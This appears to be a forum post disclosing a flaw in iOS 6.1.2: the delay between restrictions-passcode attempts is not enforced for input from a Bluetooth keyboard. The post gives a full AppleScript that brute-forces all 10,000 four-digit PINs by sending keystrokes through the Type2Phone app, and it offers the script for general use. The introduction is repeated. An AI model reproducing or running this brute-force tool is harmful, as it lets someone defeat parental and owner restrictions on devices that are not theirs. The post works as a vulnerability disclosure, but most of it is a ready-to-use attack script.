Hi,
I've found a vulnerability in iOS 6.1.2 on an iPhone 4S (probably there in other versions and for other iPhones/iPads/iPod Touches) that will allow you to brute force the restrictions passcode. Explanation is on a video at http://www.youtube.com/watch?v=dgvIdIScG0c , belowis some really simple AppleScript that I have written to exploit the vulnerability.
The gist of the solution is that iOS usually enforces a delay before re-entering a restrictions passcode after a number of failed attempts, but this is not enforced when using a bluetooth keyboard.
Enjoy!
I've found a vulnerability in iOS 6.1.2 on an iPhone 4S (probably there in other versions and for other iPhones/iPads/iPod Touches) that will allow you to brute force the restrictions passcode. Explanation is on a video at http://www.youtube.com/watch?v=dgvIdIScG0c , belowis some really simple AppleScript that I have written to exploit the vulnerability.
The gist of the solution is that iOS usually enforces a delay before re-entering a restrictions passcode after a number of failed attempts, but this is not enforced when using a bluetooth keyboard.
Enjoy!
Code:
-- Author Chris Russell
-- This script is designed to brute force the restrictions passcode on iPhone
-- Assumptions:
-- Blutooth is enabled
-- Type2Phone App is running and connected to your phone (avail on Mac App Store)
-- iPhone is switched on and on the restrictions passcode screen (General - Restrictions)
global pinCodeDigit1
global pinCodeDigit2
global pinCodeDigit3
global pinCodeDigit4
set pinCodeDigit1 to 0
set pinCodeDigit2 to 0
set pinCodeDigit3 to 0
set pinCodeDigit4 to 0
on keyStrokeNumber(num)
if (num = 0) then
tell application "System Events" to keystroke "0"
else if (num = 1) then
tell application "System Events" to keystroke "1"
else if (num = 2) then
tell application "System Events" to keystroke "2"
else if (num = 3) then
tell application "System Events" to keystroke "3"
else if (num = 4) then
tell application "System Events" to keystroke "4"
else if (num = 5) then
tell application "System Events" to keystroke "5"
else if (num = 6) then
tell application "System Events" to keystroke "6"
else if (num = 7) then
tell application "System Events" to keystroke "7"
else if (num = 8) then
tell application "System Events" to keystroke "8"
else if (num = 9) then
tell application "System Events" to keystroke "9"
end if
end keyStrokeNumber
to incrementPIN()
if (pinCodeDigit4 = 9) then
if (pinCodeDigit3 = 9) then
if (pinCodeDigit2 = 9) then
set pinCodeDigit1 to pinCodeDigit1 + 1
set pinCodeDigit2 to 0
set pinCodeDigit3 to 0
set pinCodeDigit4 to 0
else
set pinCodeDigit2 to pinCodeDigit2 + 1
set pinCodeDigit3 to 0
set pinCodeDigit4 to 0
end if
else
set pinCodeDigit3 to pinCodeDigit3 + 1
set pinCodeDigit4 to 0
end if
else
set pinCodeDigit4 to pinCodeDigit4 + 1
end if
end incrementPIN
to tryPin()
keyStrokeNumber(pinCodeDigit1)
keyStrokeNumber(pinCodeDigit2)
keyStrokeNumber(pinCodeDigit3)
keyStrokeNumber(pinCodeDigit4)
delay 1
end tryPin
try
«event ascrgdut»
end try
-- main application, simple ;)
tell application "Type2Phone" to activate
repeat 10000 times
tryPin()
incrementPIN()
end repeat
Last edited: